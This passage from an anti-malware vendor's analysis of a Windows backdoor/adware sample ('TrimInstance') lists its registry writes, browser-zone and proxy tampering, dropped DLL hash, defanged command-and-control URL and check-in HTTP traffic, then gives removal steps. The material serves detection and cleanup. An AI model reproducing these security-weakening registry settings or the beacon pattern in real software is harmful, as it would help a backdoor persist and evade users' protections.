"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"a2e3b941" = "///%"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"72758a5d" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"3c09c42b" = "///%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"587b5709" = "V/////%%"
"8b9e4cbc" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"0c230bcb" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"data.0" = "Xa0RL6a5aR76/WG xzI IsMC2TiyhIA0hiHq0mxF0j/VZU2ROBlA6JIfRxdUkflc 4n/oO5wy"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"c99a5f5c" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"date" = "1431203279"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"0e93c3f3" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"0dc3ee96" = "/P////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{bca22949}]
"DisplayName" = "TrimInstance"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"usr.0" = "LwAzvySUMOQIKEG xz"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"65114b36" = "VP/l////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"2e22d94e" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{bca22949}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TRIMIN~1\TRIMIN~1.DLL,_uninstall /un /uq"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"f0bf0bde" = "///%"
"65114b36" = "VP/l////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"Version" = "22022131"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"7f69fa1f" = "///%"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process rundll32.exe:1764 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 96 6F 6C C0 8D 61 7C AA 41 31 0C FD 50 80 11"

The process rundll32.exe:1116 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"3efeb33e" = ""

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
"f6ad6fa6" = "V/////%%"
"7f69fa1f" = "///%"
"d1abcdb6" = "///%"
"0c230bcb" = "///%"
"587b5709" = "V/////%%"
"fe94ce1e" = "V/////%%"
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"7367429f" = "///%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"37b7a6d8" = "UlAr/XJ/c//k////"
"0dc3ee96" = "/P////%%"
"48bd1aff" = "V/////%%"
"65114b36" = "VP/l////"
"51d2f2ea" = "K/Af/Xt/aPAS/X2/blAh/XD/axAs/XJ////%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"340d3099" = "/P////%%"
"6185d035" = "Vx/2/Cx/V//l////"
"f2c53c49" = "UlAr/XJ/c//k////"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"370856c7" = ""

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"e46c271e" = "///%"
"c6c5dd44" = "V/////%%"
"a0743acc" = "N/////%%"
"2e22d94e" = "///%"
"8b9e4cbc" = "V/////%%"
"e8f9dcc7" = "UlAr/XJ/c//k////"
"0e93c3f3" = "///%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"2d71d5ab" = "V/////%%"
"f0bf0bde" = "///%"
"3c09c42b" = "///%"
"c99a5f5c" = "///%"
"a1dcff5b" = "V/////%%"
"a2e3b941" = "///%"
"27ddcf6f" = "///%"
"f1f24e29" = "Vl/l/C/////%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"iiid" = "1"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B 9F FE DB 88 75 39 6A 1E FC 37 50 C5 C8 B8 20"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"c5705860" = "Vx////%%"
"bbf88800" = "///%"
"72758a5d" = "///%"
"414bc593" = "///%"
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

Dropped PE files

MD5 File path
d7c0adf378035b9cd317519da88c7799 c:\Program Files\TrimInstance\TrimInstance.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 392709 393216 4.76276 fc059c64b27e8a6ac58101150c47f0b1
.rdata 397312 47482 47616 4.57688 1b704fd0e939a4bb0426bba10095fb26
.data 446464 2085076 2074112 5.51958 191da18fb408651f75b8507ab237b7d6
.rsrc 2535424 16 512 0 bf619eac0cdf3f68d496ea9344137e8b
.reloc 2539520 20116 20480 3.06395 4d625b820d0ef868c345cbc136bbf2fd

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://turner.map.fastly.net/
hxxp://techine.info/get/?data=aDcYUN5Z3EYW9JL456nAZJf8KwefreYD8L1h+wTYpI1y9VpXkZmZHngSE7zwnWfgUyUhnlM67uE5irJwB90OGpwDiGHwKkIC2Z6BXuXoWg2pQBmdnwx01JS/WMO0XG3j+s0bH/Df0u747MS08MyLXGc+qfB7cRrIbi9EEJ6jTLBr3omdrXrr6TK6SnSzaA6NVy6170zvGuem2lU8fl0s1efyrmhoBrnNcjzTDHTCIPVuKIFmgvjVfcByN8k7G2Oz9PfSQ7pCuupeGNWxVWAvTXB1U/6sOE0KxYF7r+/k8vpFTr3tqEmit0KOWNqem1jw1xp14PoGAk4Kyq0Lp8LYiLPKp4ftXZ+xQHQ8BU/jUEZkx5AFU8VAx2Lsz+0TS0+o+nzxCZSaQz9bQUJERzW9NJU2l8SEAEc+48DfJRehaT7i+Js8DuflrrJs495oGLiiwfDiSGHU2FpsnL3zqzpsRXUzv+/SzUxUN0h1L5DG829Ppi3bujvOzllzg1ADUSkEh3PiJsyA9lHui0NICQB0pdqNAbgdJTJTWxnBisunr33Nsu&version=4 54.69.220.239
hxxp://edition.cnn.com/ 23.235.43.73


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET USER_AGENTS Suspicious Win32 User Agent
ET MALWARE Adware.Win32/SProtector.A Client Checkin

Traffic

HEAD / HTTP/1.1
Host: edition.cnn.com
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)


HTTP/1.1 200 OK
x-servedByHost: prd-10-60-170-42.nodes.56m.dmtio.net
Cache-Control: max-age=3600
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'self' hXXp://*.cnn.com:* hXXps://*.cnn.com:* *.cnn.net:* *.turner.com:* *.ugdturner.com:* *.vgtf.net:*; script-src 'unsafe-inline' 'unsafe-eval' 'self' *; style-src 'unsafe-inline' 'self' *; frame-src 'self' *; object-src 'self' *; img-src 'self' *; media-src 'self' *; font-src 'self' *; connect-src 'self' *;
Content-Type: text/html; charset=utf-8
Via: 1.1 varnish
Content-Length: 266594
Accept-Ranges: bytes
Date: Sat, 09 May 2015 22:27:59 GMT
Via: 1.1 varnish
Age: 119
Connection: close
X-Served-By: cache-iad2151-IAD, cache-ams4147-AMS
X-Cache: HIT, HIT
X-Cache-Hits: 13, 20
X-Timer: S1431210479.488919,VS0,VE0
Vary: Accept-Encoding



GET /get/?data=aDcYUN5Z3EYW9JL456nAZJf8KwefreYD8L1h+wTYpI1y9VpXkZmZHngSE7zwnWfgUyUhnlM67uE5irJwB90OGpwDiGHwKkIC2Z6BXuXoWg2pQBmdnwx01JS/WMO0XG3j+s0bH/Df0u747MS08MyLXGc+qfB7cRrIbi9EEJ6jTLBr3omdrXrr6TK6SnSzaA6NVy6170zvGuem2lU8fl0s1efyrmhoBrnNcjzTDHTCIPVuKIFmgvjVfcByN8k7G2Oz9PfSQ7pCuupeGNWxVWAvTXB1U/6sOE0KxYF7r+/k8vpFTr3tqEmit0KOWNqem1jw1xp14PoGAk4Kyq0Lp8LYiLPKp4ftXZ+xQHQ8BU/jUEZkx5AFU8VAx2Lsz+0TS0+o+nzxCZSaQz9bQUJERzW9NJU2l8SEAEc+48DfJRehaT7i+Js8DuflrrJs495oGLiiwfDiSGHU2FpsnL3zqzpsRXUzv+/SzUxUN0h1L5DG829Ppi3bujvOzllzg1ADUSkEh3PiJsyA9lHui0NICQB0pdqNAbgdJTJTWxnBisunr33Nsu&version=4 HTTP/1.1
Accept: */*
User-Agent: win32
Host: techine.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 22:34:09 GMT
Content-Length: 0
Connection: close







The Backdoor connects to the servers at the folowing location(s):







rundll32.exe_1116:




.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    %original file name%.exe:1140
    rundll32.exe:1764
    rundll32.exe:1116
    

    2. 

  2. Delete the original Backdoor file.
    3. 

  3. Delete or disinfect the following files created/modified by the Backdoor:
    

    %Program Files%\TrimInstance\TrimInstance.dll (86905 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (7972 bytes)
    

    4. 

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    5. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now